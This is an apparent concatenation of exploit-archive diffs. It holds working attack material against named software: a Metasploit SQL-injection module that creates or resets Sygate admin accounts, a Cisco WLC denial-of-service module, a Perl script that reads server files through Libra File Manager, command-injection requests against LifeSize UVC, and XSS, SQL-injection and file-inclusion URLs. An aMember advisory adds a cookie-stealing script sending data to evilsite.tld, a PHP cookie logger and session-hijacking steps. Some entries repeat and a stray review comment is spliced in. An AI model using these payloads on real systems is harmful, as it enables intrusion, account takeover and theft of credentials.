} elsif ($results =~ /HTTP\/1\..\s+([345]\d+)/) {
$self->PrintLine("[*] The Sygate Policy Manager servlet was not found.");
return $self->CheckCode('Safe');
}
$self->PrintLine("[*] Generic error...");
return $self->CheckCode('Generic');
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $vhost = $self->VHost;
my $target_port = $self->GetVar('RPORT');
my $servlet = $self->GetVar('SERVLET');
my $login = $self->GetVar('LOGIN');
my $passwd = $self->GetVar('PASSWD');
my $target = $self->Targets->[$self->GetVar('TARGET')];
if (! $HAS_SHA1) {
$self->PrintLine("[*] Please install the Digest-SHA1 module to use this exploit");
return;
}
# The 'Password' field is a hex-encoded SHA-1 digest of the "user+password" string
my $sha1 = sha1($login.$passwd);
$sha1 =~ s/./sprintf("%02x", ord($&))/ges;
$sha1 = "0x".uc($sha1);
# Maximum level of privileges
my $privs = "255";
my %sqlpayloads =
(
# Create a new valid admin account (in SMS v4.1) -- [BUG] : Can't access the Users panel :-(
'add_account' =>
"insert into CMS35.Admin (RecUpdateTime,LoginName,AdminNickName,Password,AdminRights,".
"AdminEmail,FailedLogin,AlertOnFailure,AlertFailureThreshold,OnlineState) ".
"values (getutcdate(),'$login','$login',$sha1,'$privs','',0,0,0,0)",
# Reset the password of every account to "0x4141" (in SMS v4.1) -- Denial of Service only !
'reset_all' =>
"update CMS35.Admin set Password=cast('AA' as varbinary)",
# Change the password of the selected account (in SMS v4.1) -- Yeah, full access to 'admin' !
'change_user_passwd' =>
"update CMS35.Admin set Password=$sha1 where LoginName='$login'",
);
my $payload = $sqlpayloads{ $target->[1] };
# Inject our payload
$servlet = $servlet."?uid=".$self->URLEncode("';$payload -- ")."&up=foo";
my $request =
"GET $servlet HTTP/1.1\r\n".
"Accept: */*\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
"Host: $vhost:$target_port\r\n".
"Connection: Close\r\n".
"\r\n";
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError){
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
$self->PrintLine("[*] Establishing a connection to the target...");
$self->PrintLine(' ');
$s->Send($request);
my $results = $s->Recv(-1, 20);
if ($results =~ /HTTP\/1\.. 200 OK/im) {
# Seems to be fine ;-)
$self->PrintLine("OK. Now try to log with user '$login' and passwd '$passwd'");
} else {
$self->PrintLine("Doh ! Are you sure this server is vulnerable ?");
}
$s->Close();
return;
}
sub URLEncode {
my $self = shift;
my $data = shift;
my $res;
foreach my $c (unpack('C*', $data)) {
if (
($c >= 0x30 && $c <= 0x39) ||
($c >= 0x41 && $c <= 0x5A) ||
($c >= 0x61 && $c <= 0x7A)
) {
$res .= chr($c);
} else {
$res .= sprintf("%%%.2x", $c);
}
}
return $res;
}
sub VHost {
my $self = shift;
my $name = $self->GetVar('VHOST') || $self->GetVar('RHOST');
return $name;
}
1;
# milw0rm.com [2006-04-15]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31436/info
WhoDomLite is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
WhoDomLite 1.1.3 is vulnerable; other versions may also be affected.
http://www.example.com/wholite.cgi?dom= xss_code &tld=com&action=search


@ -1,52 +1,52 @@
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco WLC 4200 Basic Auth Denial of Service',
'Description' => %q{
This module triggers a Denial of Service condition in the Cisco WLC 4200
HTTP server. By sending a GET request with long authentication data, the
device becomes unresponsive and reboots. Firmware is reportedly vulnerable.
},
'Author' => [ 'Christoph Bott <msf[at]bott.syss.de>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 5949 $',
'References' =>
[
[ 'BID', '???'],
[ 'CVE', '???'],
[ 'URL', 'http://www.cisco.com/?????'],
],
'DisclosureDate' => 'January 26 2009'))
register_options(
[
Opt::RPORT(80),
], self.class)
end
def run
connect
print_status("Sending HTTP DoS packet")
sploit =
"GET /screens/frameset.html HTTP/1.0\r\n" +
"Authorization: Basic MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDoxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0"
sock.put(sploit + "\r\n")
disconnect
end
end
# milw0rm.com [2009-07-27]
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco WLC 4200 Basic Auth Denial of Service',
'Description' => %q{
This module triggers a Denial of Service condition in the Cisco WLC 4200
HTTP server. By sending a GET request with long authentication data, the
device becomes unresponsive and reboots. Firmware is reportedly vulnerable.
},
'Author' => [ 'Christoph Bott <msf[at]bott.syss.de>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 5949 $',
'References' =>
[
[ 'BID', '???'],
[ 'CVE', '???'],
[ 'URL', 'http://www.cisco.com/?????'],
],
'DisclosureDate' => 'January 26 2009'))
register_options(
[
Opt::RPORT(80),
], self.class)
end
def run
connect
print_status("Sending HTTP DoS packet")
sploit =
"GET /screens/frameset.html HTTP/1.0\r\n" +
"Authorization: Basic MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDoxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0"
sock.put(sploit + "\r\n")
disconnect
end
end
# milw0rm.com [2009-07-27]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31410/info
OpenNMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to OpenNMS 1.5.94 are vulnerable.
http://www.example.com/opennms/j_acegi_security_check?j_username=test'><script>alert('hi');</script>&j_password=test


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31410/info
OpenNMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to OpenNMS 1.5.94 are vulnerable.
http://www.example.com/opennms/notification/list.jsp?username=%3Cscript%3Ealert%28%27hi%27%29%3B%3C%2Fscript%3E


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31410/info
OpenNMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to OpenNMS 1.5.94 are vulnerable.
http://www.example.com/opennms/event/list?sortby=id&limit=10&filter=msgsub%3D%3Cscript%3Ealert%28%27hi%27%29%3B%3C%2Fscript%3E&filter=iplike%3D*.*.*.*

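--- a/platforms/php/webapps/32418.txt
+++ b/platforms/php/webapps/32418.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/31401/info
+EasyRealtorPRO is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+http://www.example.com/site_search.php?search_purpose=sale&search_type=&search_price_min=&search_price_max=&search_bedroom=1&search_bathroom=1&search_city=&search_state=&search_zip=&search_radius=&search_country=&search_order=type&search_ordermethod=asc&page=2&item=5'SQL INJECTION
+http://www.example.com/site_search.php?search_purpose=sale&search_type=&search_price_min=&search_price_max=&search_bedroom=1&search_bathroom=1&search_city=&search_state=&search_zip=&search_radius=&search_country=&search_order=type&search_ordermethod=asc'SQL INJECTION&page=2&item=5
+http://www.example.com/site_search.php?search_purpose=sale&search_type=&search_price_min=&search_price_max=&search_bedroom=1&search_bathroom=1&search_city=&search_state=&search_zip=&search_radius=&search_country=&search_order=type'SQL INJECTION&search_ordermethod=asc&page=2&item=5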

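--- a/platforms/php/webapps/32419.pl
+++ b/platforms/php/webapps/32419.pl
@@ -0,0 +1,101 @@
+source: http://www.securityfocus.com/bid/31403/info
+Libra File Manager is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+An attacker can exploit this vulnerability using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks.
+Libra File Manager 2.0 and prior versions are available.
+#! /usr/bin/perl
+# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+# Libra PHP File Manager <= 1.18 / Local File Inclusion Vulnerability
+# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+# Program: Libra PHP File Manager
+# Version: <= 1.18
+# File affected: fileadmin.php
+# Download: http://file.sourceforge.net
+#
+#
+# Found by Pepelux <pepelux[at]enye-sec.org>
+# eNYe-Sec - www.enye-sec.org
+# Greetings to Ka0x for help me with the perl code :)
+#
+# You can scale directories and read any file that you have permissions
+use LWP::UserAgent;
+$ua = LWP::UserAgent->new;
+print "\e[2J";
+system(($^O eq 'MSWin32') ? 'cls' : 'clear');
+my ($host, $path, $action) = @ARGV ;
+unless($ARGV[2]) {
+print "Usage: perl $0 <host> <path> <action>\n";
+print "\tex: perl $0 http://www.example.com /etc/ list\n";
+print "\tex: perl $0 http://www.example.com /etc/passwd edit\n";
+print "Actions:\n";
+print " list:\n";
+print " edit:\n\n";
+exit 1;
+}
+$ua->agent("$0/0.1 " . $ua->agent);
+$host = "http://".$host if ($host !~ /^http:/);
+$path = $path."/" if ($action eq "list" && $path !~ /\/$/);
+$op = "home" if ($action == "list");
+if ($action eq "edit") {
+$aux = $path;
+$directory = "";
+do {
+$x = index($aux, "/");
+$y = length($aux) - $x;
+$directory .= substr($aux, 0, $x+1);
+$aux = substr($aux, $x+1, $y);
+} until ($x == -1);
+$path = $directory;
+$file = $aux;
+$op = "edit";
+}
+$url = $host."/fileadmin.php?user=root&isadmin=yes&op=".$op."&folder=".$path;
+$url .= "&fename=".$file if ($action eq "edit");
+$req = HTTP::Request->new(GET => $url);
+$req->header('Accept' => 'text/html');
+$res = $ua->request($req);
+if ($res->is_success) {
+$result = $res->content;
+if ($action eq "edit") {
+print "Viewing $path$file:\n";
+print $1,"\n" if($result =~ /name="ncontent">(.*)<\/textarea>/s);
+}
+else {
+print "Files in $path:\n";
+$x = index($result, "Files:") + 6;
+$result = substr($result, $x, length($result)-$x);
+$result =~ s/<[^>]*>//g;
+$result =~ s/Filename//g;
+$result =~ s/Size//g;
+$result =~ s/Edit//g;
+$result =~ s/Rename//g;
+$result =~ s/Delete//g;
+$result =~ s/Move//g;
+$result =~ s/View//g;
+$result =~ s/Open//g;
+$result =~ s/\d*//g;
+$result =~ s/\s+/\n/g;
+$x = index($result, "Copyright");
+$result = substr($result, 0, $x);
+print $result;
+}
+}
+else { print "Error: " . $res->status_line . "\n";}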
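Review bot: `$op = "home" if ($action == "list");` compares two non-numeric strings with the numeric operator, so both sides evaluate to 0 and the condition holds for every action value; the script only behaves as intended because the edit branch below overwrites `$op` afterwards. Use the string operator, as the preceding line already does: `$op = "home" if ($action eq "list");`. The file also has no `use strict;` / `use warnings;`, which would have reported this comparison and the undeclared globals (`$op`, `$file`, `$url`) at compile time.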


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31407/info
FlatPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to FlatPress 0.804.1 are vulnerable.
<form method="post" action="http://localhost/flatpress/login.php"> <input type="text" name="user" value='"><script>alert(1)</script>'> <input type=submit></form> <form method="post" action="http://localhost/flatpress/login.php"> <input type="text" name="pass" value='"><script>alert(1)</script>'> <input type=submit></form> <form method="post" action="http://localhost/flatpress/contact.php"> <input type="text" name="name" value='"><script>alert(1)</script>'> <input type=submit></form>

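--- a/platforms/php/webapps/32422.txt
+++ b/platforms/php/webapps/32422.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/31408/info
+Vikingboard is prone to an unauthorized-access vulnerability.
+Successfully exploiting this issue can allow attackers to register and log in as existing users.
+Vikingboard 0.2 Beta is vulnerable; other versions may also be affected.
+The following example account registration data is available:
+Username: [username][whitespace characters]NULL
+Password: [password]
+E-Mail: [E-Mail]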


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31419/info
Barcode Generator is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
Barcode Generator 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/barcodegen.1d-php4.v2.0.0/class/LSTable.php?class_dir=http://example2.com/shell/c99.txt?


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31437/info
Lyrics Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/search_results.php?k= XSS_CODE

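--- a/platforms/php/webapps/32432.txt
+++ b/platforms/php/webapps/32432.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/31438/info
+Clickbank Portal is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+The following example is available:
+http://www.example.com/search.php
+in search box code Xss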

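--- a/platforms/php/webapps/32433.txt
+++ b/platforms/php/webapps/32433.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/31441/info
+Membership Script is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+http://www.example.com/stuffs.php?category= XSS_CODE
+http://www.example.com/search.php
+in search box code Xss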


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31442/info
Recipe Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/search.php?keyword= XSS_HACKING

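--- a/platforms/php/webapps/32437.txt
+++ b/platforms/php/webapps/32437.txt
@@ -0,0 +1,82 @@
+LifeSize UVC 1.2.6 authenticated vulnerabilities
+ 
+RCE as www-data:
+ 
+POST /server-admin/operations/diagnose/ping/ HTTP/1.1
+Host: 172.31.16.99
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://172.31.16.99/server-admin/operations/diagnose/ping/
+Cookie: csrftoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx; sessionid=2872e94ecc65c01161fb19e9f45da579
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 118
+ 
+csrfmiddlewaretoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx&source_ip=172.31.16.99&destination_ip=goo`whoami`gle.com
+ 
+The above POST results in a response containing:
+<span class="red_txt">ping: unknown host goowww-datagle.com</span><br/>
+ 
+ 
+ 
+ 
+ 
+RCE as www-data:
+ 
+POST /server-admin/operations/diagnose/trace/ HTTP/1.1
+Host: 172.31.16.99
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://172.31.16.99/server-admin/operations/diagnose/trace/
+Cookie: csrftoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx; sessionid=2872e94ecc65c01161fb19e9f45da579
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 101
+ 
+csrfmiddlewaretoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx&source_ip=172.31.16.99&destination_ip=go`whoami`ogle.com
+ 
+Results in the following error:
+gowww-dataogle.com: Name or service not known
+ 
+ 
+ 
+ 
+ 
+ 
+RCE as www-data:
+ 
+POST /server-admin/operations/diagnose/dns/ HTTP/1.1
+Host: 172.31.16.99
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://172.31.16.99/server-admin/operations/diagnose/dns/
+Cookie: csrftoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx; sessionid=2872e94ecc65c01161fb19e9f45da579
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 116
+ 
+csrfmiddlewaretoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx&source_ip=172.31.16.99&destination_ip=go`whoami`ogle.com&query_type=ANY
+ 
+Results in the following results:
+; <<>> DiG 9.7.0-P1 <<>> -t ANY gowww-dataogle.com -b 172.31.16.99
+;; global options: +cmd
+;; Got answer:
+;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 54663
+;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
+ 
+;; QUESTION SECTION:
+;gowww-dataogle.com. IN ANY
+ 
+;; AUTHORITY SECTION:
+com. 890 IN SOA a.gtld-servers.net. nstld.verisign-grs.com. 1395411948 1800 900 604800 86400
+ 
+;; Query time: 21 msec
+;; SERVER: 8.8.8.8#53(8.8.8.8)
+;; WHEN: Fri Mar 21 10:26:21 2014
+;; MSG SIZE rcvd: 109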


@ -1,19 +1,19 @@
--------------------------------------
Pro Manager 0.73 Local File Inclusion Vuln
--------------------------------------
http://www.sfr-fresh.com/unix/privat/proManager-0.73.tar.gz
--------------------------------------
By : Stack
email : Wanted
--------------------------------------
Exploit :
http://localhost/path/inc/config.php?language=../../../../[without php extention]
http://localhost/path/inc/config.php?language=../../../../etc/passwd%00
--------------------------------------
thnx allah
Greats to all arabians haxors :d
D-S.Morocco Is The Best :d
Waiting
# milw0rm.com [2008-06-09]
--------------------------------------
Pro Manager 0.73 Local File Inclusion Vuln
--------------------------------------
http://www.sfr-fresh.com/unix/privat/proManager-0.73.tar.gz
--------------------------------------
By : Stack
email : Wanted
--------------------------------------
Exploit :
http://localhost/path/inc/config.php?language=../../../../[without php extention]
http://localhost/path/inc/config.php?language=../../../../etc/passwd%00
--------------------------------------
thnx allah
Greats to all arabians haxors :d
D-S.Morocco Is The Best :d
Waiting
# milw0rm.com [2008-06-09]


@ -1,216 +1,216 @@
AMember - Multiple Vulnerabilities
Version Affected: 3.1.7 (Apr-10-2009) (newest)
Info: aMember is a flexible membership and subscription management PHP script. It has support for
PayPal, BeanStream, 2Checkout, NoChex, VeriSign PayFlow, Authorize.Net, PaySystems, Probilling,
Multicards, E-Gold and Clickbank payment systems (see list of integrated payment systems) and
allows you to setup paid-membership areas on your site. It can also be used without any payment
system - you can manage users manually.
aMember Pro also supports integration plugins to link users database with third-party scripts,
for example vBulletin, Joomla, WordPress (see list of integration plugins).
aMember is a perfect membership software for selling digital subscriptions and downloads.
Opinion: CGI Systems' website has an XSS issue too, they obviously don't realise the impact of XSS.
Credits: Matt, fiftysixer, mind_warlock, fourthdimension, NetRolller3D, ha.ckers, webDEViL and all of InterN0T :)
Accurate Googled0rk: (fewer results)
http://lmgtfy.com/?q=inurl:/amember intext:© CGI-Central.NET, 2002-2006
Inaccurate Googled0rk: (more results)
http://lmgtfy.com/?q=intext:© CGI-Central.NET, 2002-2006
External Links:
http://www.amember.com/
http://www.amember.com/p/Main/Download
http://www.amember.com/p/Main/Demo
-:: The Advisory ::-
Version Information:
http://www.website.tld/amember/docs/changelog.txt
Information Disclosure:
http://www.website.tld/amember/docs/tester.php
http://www.website.tld/amember/setup.php?step='
http://www.website.tld/amember/admin/report.php?report=' (admin only)
- More files are affected. (discloses full path to the file)
Cross Site Scripting (admin only - might not survive a login screen!)
http://www.website.tld/amember/admin/users.php?letter="><script>alert(0)</script>
http://www.website.tld/amember/admin/users.php?status="><script>alert(0)</script>
http://www.website.tld/amember/admin/users.php?letter="><script>alert(0)</script>
http://www.website.tld/amember/admin/users.php?action=<script>alert(0)</script>
http://www.website.tld/amember/admin/setup.php?notebook=<script>alert(0)</script>
http://www.website.tld/amember/admin/newsletter_threads.php?action=edit&thread_id="><script>alert(0)</script>
http://www.website.tld/amember/admin/newsletter_guests.php?action=edit&guest_id="><script>alert(0)</script>
http://www.website.tld/amember/admin/products.php?action=<script>alert(0)</script>
http://www.website.tld/amember/admin/protect.php?action=<script>alert(0)</script>
http://www.website.tld/amember/admin/coupons.php?action=<script>alert(0)</script>
http://www.website.tld/amember/admin/aff_banners.php?action=edit_banner&banner_id="><script>alert(0)</script>
http://www.website.tld/amember/admin/aff_banners.php?action=edit_link&banner_id="><script>alert(0)</script>
http://www.website.tld/amember/admin/email_templates.php?a=edit&tpl=<script>alert(0)</script>
http://www.website.tld/amember/aff.php?action=<script>alert(0)</script> (this might only affect attacker)
- More files might be affected.
HTML Injection: (insert: "><script>alert(0)</script> into the mentioned forms)
http://www.website.tld/amember/signup.php (first- and last-name)
http://www.website.tld/amember/aff_signup.php (first- and last-name)
http://www.website.tld/amember/profile.php (first- and last-name)
HTML Injection Exception: (this injection might only be possible to be seen by the attacker)
http://www.website.tld/amember/aff.php?action=payout_info (other payment plugins might be vulnerable too)
Affeced Sites (by HTML Injection):
http://www.website.tld/amember/admin/index.php (if the menu user-lookup returns positive)
http://www.website.tld/amember/admin/users.php?q=VALIDUSERNAME&q_where=anywhere&action=search_by_string
http://www.website.tld/amember/admin/users.php?status= (this will always return the HTML Injection)
http://www.website.tld/amember/admin/users.php?action=edit&member_id=VALIDUSERID
http://www.website.tld/amember/admin/users.php?action=actions&member_id=VALIDUSERID
http://www.website.tld/amember/admin/users.php?action=edit_payment&payment_id=VALIDPAYMENTID&member_id=VALIDUSERID
http://www.website.tld/amember/admin/users.php?letter=FIRSTLETTEROFYOURUSERNAME
-- More files might be affected.
SQL Injection: (requires admin access)
http://www.website.tld/amember/admin/access_log.php?order1='SQL'a.time+DESC&order2='SQL'a.time+DESC
http://www.website.tld/amember/admin/aff_clicks.php?year_month='SQL'&action=aff_sales
http://www.website.tld/amember/admin/products.php?action=delete&product_id='SQL'
-- More files might be affected, the depth of SQL Injection was not checked!
-:: Solution ::-
All the files are encrypted according to CGI Systems' website.
Questions and answers (quote)
I've downloaded aMember, but the source code is corrupted. How can I download it again ?
The source code is not corrupted, but it is encrypted with Zend Encoder or IonCube Encoder technology
Which essentially mean i was unable to find any solution to the problem.
I believe this vulnerability might be exploited in the wild due to it is very
easy to find and take advantage of. (if you know what you're looking for)
Addition: The most easy solution would be to use a regular expression to fix this issue.
-:: Ways of abusing the HTML Injection and XSS ::-
The following are examples of what you can input as first- and/or last-name:
"><SCRIPT SRC=//intern0t.net/.j>
- Works only in FireFox and NetScape 8.1-G (Gecko)
Protocol resolution in script tags. This particular variant was submitted by Łukasz Pilorz and was based
partially off of Ozh's protocol resolution bypass below. This cross site scripting example works in IE,
Netscape in IE rendering mode and Opera if you add in a </SCRIPT> tag at the end. However, this is
especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is
valid, regardless of the encoding type because the browser knows it in context of a SCRIPT tag.
Firstname: "><script src="//intern0t.net/.j
Lastname: "></script> </
- Works in FireFox but should work in all browsers.
Firstname: "><iframe src="http://google.com
Lastname: "></iframe> </
- Works in all browsers.
Firstname: "><iframe src="//intern0t.net
Lastname: "></iframe> </
- Should work in all browsers as well. (tested in FireFox)
The following is an example of how a cookie stealer will work in conjunction with the exploit:
<script>document.location=%22http://evilsite.tld/cookiestealer.php?cookie=%22 %2B document.cookie;</script>
- The reason why "browser-hex" is used is because the above would else issue an error and thereby not work.
-- Reference about url encoding: http://www.blooberry.com/indexdot/html/topics/urlencoding.htm
CookieLogger:
<?php
function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}
function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();
$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");
if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
fclose($log);
}
logData();
header ("Location: http://www.pichashare.com/Flash/lazytown_pirate.swf");
?>
When you have gotten a hash from the admin of the victim site you can issue:
Javascript:void(document.cookie="PHPSESSID=hash") (where hash is the PHPSESSID hash/cookie)
What's the first thing you could do as admin?
http://www.website.tld/amember/admin/backup.php
What's the best way to exploit the vulnerability?
1) Make a file named: .j (and upload to a domain which has a name equal to or shorter than 8 characters)
2) The file should contain the following:
HTML Code:
document.location='http://evilsite.tld/cookielogger.php?cookie=' + document.cookie;
3) Sign up and make you first name: (try aff_signup.php to avoid paying!)
"><script src="//evilsite.tld/.j
4) Make your last name:
"></script> </
5) Make your username:
aaaaaaaaa
6) After signing up, go to profile.php and make sure the first- and last-name are correct.
7) Wait or social engineer the administrator to click: "Browse Users" in his admin panel, that's all!
Conclusion:
The vendor was (originally) not contacted due to they have encrypted all of
the files and because i believe in full disclosure and open source!
The vendor was contacted the 25th May due to the vulnerability might be
exploited more than usual in the wild after public disclosure the 14th May.
Reference:
http://forum.intern0t.net/exploits-vulnerabilities-pocs/1018-intern0t-amember-3-1-7-multiple-vulnerabilities.html
Disclosure Information:
- Vulnerabilities found early start of May 2009.
- Advisory finished and published 14th May on InterN0T.
- Bugtraq (SecurityFocus) and Milw0rm contacted the 24th May.
- OSVDB, CVE (Mitre) and CGI Systems contacted the 25th May.
# milw0rm.com [2009-05-29]
AMember - Multiple Vulnerabilities
Version Affected: 3.1.7 (Apr-10-2009) (newest)
Info: aMember is a flexible membership and subscription management PHP script. It has support for
PayPal, BeanStream, 2Checkout, NoChex, VeriSign PayFlow, Authorize.Net, PaySystems, Probilling,
Multicards, E-Gold and Clickbank payment systems (see list of integrated payment systems) and
allows you to setup paid-membership areas on your site. It can also be used without any payment
system - you can manage users manually.
aMember Pro also supports integration plugins to link users database with third-party scripts,
for example vBulletin, Joomla, WordPress (see list of integration plugins).
aMember is a perfect membership software for selling digital subscriptions and downloads.
Opinion: CGI Systems' website has an XSS issue too, they obviously don't realise the impact of XSS.
Credits: Matt, fiftysixer, mind_warlock, fourthdimension, NetRolller3D, ha.ckers, webDEViL and all of InterN0T :)
Accurate Googled0rk: (fewer results)
http://lmgtfy.com/?q=inurl:/amember intext:© CGI-Central.NET, 2002-2006
Inaccurate Googled0rk: (more results)
http://lmgtfy.com/?q=intext:© CGI-Central.NET, 2002-2006
External Links:
http://www.amember.com/
http://www.amember.com/p/Main/Download
http://www.amember.com/p/Main/Demo
-:: The Advisory ::-
Version Information:
